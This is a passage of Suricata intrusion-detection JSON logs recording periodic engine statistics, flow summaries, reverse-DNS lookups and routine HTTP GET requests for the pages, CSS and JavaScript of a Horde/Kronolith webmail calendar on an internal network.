{"timestamp":"2020-02-29T00:26:06.000214+0000","event_type":"stats","stats":{"uptime":15218,"capture":{"kernel_packets":141634,"kernel_drops":0},"decoder":{"pkts":141724,"bytes":97351162,"invalid":195,"ipv4":140135,"ipv6":10,"ethernet":141724,"raw":0,"null":0,"sll":0,"tcp":134557,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10005,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2909,"ssn_memcap_drop":0,"pseudo":354,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2925,"synack":2916,"rst":1221,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2885,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":5,"flows_notimeout":0,"flows_timeout":5,"flows_timeout_inuse":0,"flows_removed":5,"rows_checked":65536,"rows_skipped":65531,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:13.000168+0000","event_type":"stats","stats":{"uptime":15225,"capture":{"kernel_packets":141728,"kernel_drops":0},"decoder":{"pkts":141732,"bytes":97351680,"invalid":195,"ipv4":140141,"ipv6":10,"ethernet":141732,"raw":0,"null":0,"sll":0,"tcp":134563,"udp":5368,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7087840},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2909,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2925,"synack":2916,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"alert":26},"app_layer":{"flow":{"http":1916,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2455,"failed_udp":116},"tx":{"http":4975,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2539}},"flow_mgr":{"closed_pruned":2885,"new_pruned":17,"est_pruned":2542,"bypassed_pruned":0,"flows_checked":4,"flows_notimeout":3,"flows_timeout":1,"flows_timeout_inuse":1,"flows_removed":0,"rows_checked":65536,"rows_skipped":65532,"rows_empty":0,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":560,"memcap":0}}} 
{"timestamp":"2020-02-29T00:26:13.000748+0000","flow_id":291270444040479,"event_type":"flow","src_ip":"192.168.10.81","src_port":53128,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":46,"pkts_toclient":48,"bytes_toserver":11808,"bytes_toclient":42234,"start":"2020-02-29T00:24:57.180511+0000","end":"2020-02-29T00:25:12.186174+0000","age":15,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:13.000894+0000","flow_id":1751078273571388,"event_type":"flow","src_ip":"192.168.10.122","src_port":33195,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:12.088636+0000","end":"2020-02-29T00:21:12.197781+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:13.001057+0000","flow_id":503484763396705,"event_type":"flow","src_ip":"192.168.10.122","src_port":123,"dest_ip":"162.159.200.123","dest_port":123,"proto":"UDP","app_proto":"failed","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":90,"bytes_toclient":90,"start":"2020-02-29T00:21:12.449121+0000","end":"2020-02-29T00:21:12.451002+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:14.850575+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":52162,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":14644,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} 
{"timestamp":"2020-02-29T00:26:14.959074+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52162,"proto":"UDP","dns":{"type":"answer","id":14644,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:14.959074+0000","flow_id":563953627757199,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":52162,"proto":"UDP","dns":{"type":"answer","id":14644,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:15.000259+0000","flow_id":1436373150435366,"event_type":"flow","src_ip":"192.168.10.130","src_port":34294,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":16,"pkts_toclient":19,"bytes_toserver":3992,"bytes_toclient":16373,"start":"2020-02-29T00:25:09.690214+0000","end":"2020-02-29T00:25:14.727805+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:15.158192+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090}} 
{"timestamp":"2020-02-29T00:26:16.000361+0000","flow_id":1992601480049501,"event_type":"flow","src_ip":"192.168.10.130","src_port":34298,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":9,"pkts_toclient":9,"bytes_toserver":2028,"bytes_toclient":3463,"start":"2020-02-29T00:25:09.701277+0000","end":"2020-02-29T00:25:14.750566+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:18.001230+0000","flow_id":235487409740482,"event_type":"flow","src_ip":"192.168.10.81","src_port":53132,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","app_proto":"http","flow":{"pkts_toserver":10,"pkts_toclient":11,"bytes_toserver":1954,"bytes_toclient":6225,"start":"2020-02-29T00:25:12.465602+0000","end":"2020-02-29T00:25:17.888501+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:18.001636+0000","flow_id":1098183115353279,"event_type":"flow","src_ip":"192.168.10.122","src_port":57780,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","app_proto":"dns","flow":{"pkts_toserver":1,"pkts_toclient":1,"bytes_toserver":86,"bytes_toclient":141,"start":"2020-02-29T00:21:17.208063+0000","end":"2020-02-29T00:21:17.319419+0000","age":0,"state":"established","reason":"timeout","alerted":false}} {"timestamp":"2020-02-29T00:26:19.656142+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/services\/portal\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/prefs.php","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":8090},"app_proto":"http","fileinfo":{"filename":"\/services\/portal\/","state":"CLOSED","stored":false,"size":47024,"tx_id":0}} {"timestamp":"2020-02-29T00:26:19.667468+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"192.168.10.122","src_port":44728,"dest_ip":"10.18.255.254","dest_port":53,"proto":"UDP","dns":{"type":"query","id":32226,"rrname":"81.10.168.192.in-addr.arpa","rrtype":"PTR","tx_id":0}} {"timestamp":"2020-02-29T00:26:19.775983+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44728,"proto":"UDP","dns":{"type":"answer","id":32226,"rcode":"NXDOMAIN","rrname":"81.10.168.192.in-addr.arpa"}} {"timestamp":"2020-02-29T00:26:19.775983+0000","flow_id":1218721392308044,"in_iface":"eth0","event_type":"dns","src_ip":"10.18.255.254","src_port":53,"dest_ip":"192.168.10.122","dest_port":44728,"proto":"UDP","dns":{"type":"answer","id":32226,"rcode":"NXDOMAIN","rrname":"168.192.IN-ADDR.ARPA","rrtype":"SOA","ttl":20864}} {"timestamp":"2020-02-29T00:26:19.913180+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24491}} 
{"timestamp":"2020-02-29T00:26:19.955751+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/html","http_refer":"http:\/\/mail.spiral.com\/services\/portal\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":24491},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/","state":"TRUNCATED","stored":false,"size":106496,"tx_id":1}} {"timestamp":"2020-02-29T00:26:19.958220+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451}} {"timestamp":"2020-02-29T00:26:19.961103+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":0,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470}} 
{"timestamp":"2020-02-29T00:26:19.966016+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2451},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/screen.css","state":"CLOSED","stored":false,"size":10823,"tx_id":2}} {"timestamp":"2020-02-29T00:26:19.968061+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":3,"http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499}} {"timestamp":"2020-02-29T00:26:19.969853+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/keynavlist.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2499},"app_proto":"http","fileinfo":{"filename":"\/js\/keynavlist.js","state":"CLOSED","stored":false,"size":8737,"tx_id":3}} 
{"timestamp":"2020-02-29T00:26:19.971829+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":4,"http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778}} {"timestamp":"2020-02-29T00:26:19.973668+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/autocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":2778},"app_proto":"http","fileinfo":{"filename":"\/js\/autocomplete.js","state":"CLOSED","stored":false,"size":9648,"tx_id":4}} {"timestamp":"2020-02-29T00:26:19.974070+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":5,"http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403}} 
{"timestamp":"2020-02-29T00:26:19.976662+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/liquidmetal.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1403},"app_proto":"http","fileinfo":{"filename":"\/js\/liquidmetal.js","state":"CLOSED","stored":false,"size":3834,"tx_id":5}} {"timestamp":"2020-02-29T00:26:19.978233+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":6,"http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046}} {"timestamp":"2020-02-29T00:26:19.987537+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/prettyautocomplete.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 
Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3046},"app_proto":"http","fileinfo":{"filename":"\/js\/prettyautocomplete.js","state":"CLOSED","stored":false,"size":10406,"tx_id":6}} {"timestamp":"2020-02-29T00:26:19.998674+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":7,"http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614}} {"timestamp":"2020-02-29T00:26:20.000847+0000","event_type":"stats","stats":{"uptime":15232,"capture":{"kernel_packets":141740,"kernel_drops":0},"decoder":{"pkts":141750,"bytes":97361929,"invalid":195,"ipv4":140159,"ipv6":10,"ethernet":141750,"raw":0,"null":0,"sll":0,"tcp":134579,"udp":5370,"sctp":0,"icmpv4":15,"icmpv6":10,"ppp":0,"pppoe":0,"gre":0,"vlan":0,"vlan_qinq":0,"teredo":0,"ipv4_in_ipv6":0,"ipv6_in_ipv6":0,"mpls":0,"avg_pkt_size":686,"max_pkt_size":1486,"erspan":0,"ipraw":{"invalid_ip_version":0},"ltnull":{"pkt_too_small":0,"unsupported_type":0},"dce":{"pkt_too_small":0}},"flow":{"memcap":0,"spare":10000,"emerg_mode_entered":0,"emerg_mode_over":0,"tcp_reuse":0,"memuse":7086976},"defrag":{"ipv4":{"fragments":0,"reassembled":0,"timeouts":0},"ipv6":{"fragments":0,"reassembled":0,"timeouts":0},"max_frag_hits":0},"tcp":{"sessions":2910,"ssn_memcap_drop":0,"pseudo":355,"pseudo_failed":0,"invalid_checksum":0,"no_flow":0,"syn":2926,"synack":2917,"rst":1223,"segment_memcap_drop":0,"stream_depth_reached":0,"reassembly_gap":148,"memuse":819200,"reassembly_memuse":12281632},"detect":{"al
ert":26},"app_layer":{"flow":{"http":1917,"ftp":0,"smtp":0,"tls":787,"ssh":0,"imap":0,"msn":0,"smb":0,"dcerpc_tcp":0,"dns_tcp":0,"failed_tcp":107,"dcerpc_udp":0,"dns_udp":2456,"failed_udp":116},"tx":{"http":4976,"smtp":0,"tls":0,"dns_tcp":0,"dns_udp":2540}},"flow_mgr":{"closed_pruned":2888,"new_pruned":17,"est_pruned":2544,"bypassed_pruned":0,"flows_checked":6,"flows_notimeout":2,"flows_timeout":4,"flows_timeout_inuse":4,"flows_removed":0,"rows_checked":65536,"rows_skipped":65529,"rows_empty":1,"rows_busy":0,"rows_maxlen":1},"dns":{"memuse":9572,"memcap_state":0,"memcap_global":0},"http":{"memuse":86812,"memcap":0}}} {"timestamp":"2020-02-29T00:26:20.001315+0000","flow_id":1303568466127980,"event_type":"flow","src_ip":"192.168.10.130","src_port":34286,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":35,"pkts_toclient":61,"bytes_toserver":3699,"bytes_toclient":80638,"start":"2020-02-29T00:25:01.732268+0000","end":"2020-02-29T00:25:06.784171+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.001608+0000","flow_id":331982439825668,"event_type":"flow","src_ip":"192.168.10.130","src_port":34300,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":1292,"bytes_toclient":719,"start":"2020-02-29T00:25:09.704772+0000","end":"2020-02-29T00:25:15.702759+0000","age":6,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1f","tcp_flags_ts":"1f","tcp_flags_tc":"1b","syn":true,"fin":true,"rst":true,"psh":true,"ack":true,"state":"closed"}} 
{"timestamp":"2020-02-29T00:26:20.001680+0000","flow_id":922484608450970,"event_type":"flow","src_ip":"192.168.10.130","src_port":34302,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":10,"pkts_toclient":8,"bytes_toserver":2110,"bytes_toclient":1988,"start":"2020-02-29T00:25:09.704922+0000","end":"2020-02-29T00:25:16.392611+0000","age":7,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.001745+0000","flow_id":1539237617182180,"event_type":"flow","src_ip":"192.168.10.130","src_port":34296,"dest_ip":"192.168.10.122","dest_port":443,"proto":"TCP","app_proto":"tls","flow":{"pkts_toserver":11,"pkts_toclient":10,"bytes_toserver":2151,"bytes_toclient":3711,"start":"2020-02-29T00:25:09.697828+0000","end":"2020-02-29T00:25:14.727346+0000","age":5,"state":"closed","reason":"timeout","alerted":false},"tcp":{"tcp_flags":"1b","tcp_flags_ts":"1b","tcp_flags_tc":"1b","syn":true,"fin":true,"psh":true,"ack":true,"state":"closed"}} {"timestamp":"2020-02-29T00:26:20.000326+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/kronolith\/themes\/default\/dynamic\/screen.css","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"text\/css","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3470},"app_proto":"http","fileinfo":{"filename":"\/kronolith\/themes\/default\/dynamic\/screen.css","state":"CLOSED","stored":false,"size":17678,"tx_id":0}} 
{"timestamp":"2020-02-29T00:26:20.000682+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":1,"http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275}} {"timestamp":"2020-02-29T00:26:20.005962+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53148,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/imple.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":614},"app_proto":"http","fileinfo":{"filename":"\/js\/imple.js","state":"CLOSED","stored":false,"size":1359,"tx_id":7}} {"timestamp":"2020-02-29T00:26:20.007455+0000","flow_id":1225885397469246,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53148,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":8,"http":{"hostname":"mail.spiral.com","url":"\/kronolith\/js\/dragdrop2.js?v=cdac878cfbf59a65fe9f73fb16b22d01","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":6376}} 
{"timestamp":"2020-02-29T00:26:20.008209+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/redbox.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":1275},"app_proto":"http","fileinfo":{"filename":"\/js\/redbox.js","state":"CLOSED","stored":false,"size":4234,"tx_id":1}} {"timestamp":"2020-02-29T00:26:20.008619+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"http","src_ip":"192.168.10.81","src_port":53150,"dest_ip":"192.168.10.122","dest_port":80,"proto":"TCP","tx_id":2,"http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 Firefox\/73.0","http_content_type":"application\/javascript","http_refer":"http:\/\/mail.spiral.com\/kronolith\/","http_method":"GET","protocol":"HTTP\/1.1","status":200,"length":3401}} {"timestamp":"2020-02-29T00:26:20.011114+0000","flow_id":1691541457050508,"in_iface":"eth0","event_type":"fileinfo","src_ip":"192.168.10.122","src_port":80,"dest_ip":"192.168.10.81","dest_port":53150,"proto":"TCP","http":{"hostname":"mail.spiral.com","url":"\/js\/colorpicker.js?v=dc442439853f80a9467ce727c08e9b0e","http_user_agent":"Mozilla\/5.0 (X11; Ubuntu; Linux x86_64; rv:73.0) Gecko\/20100101 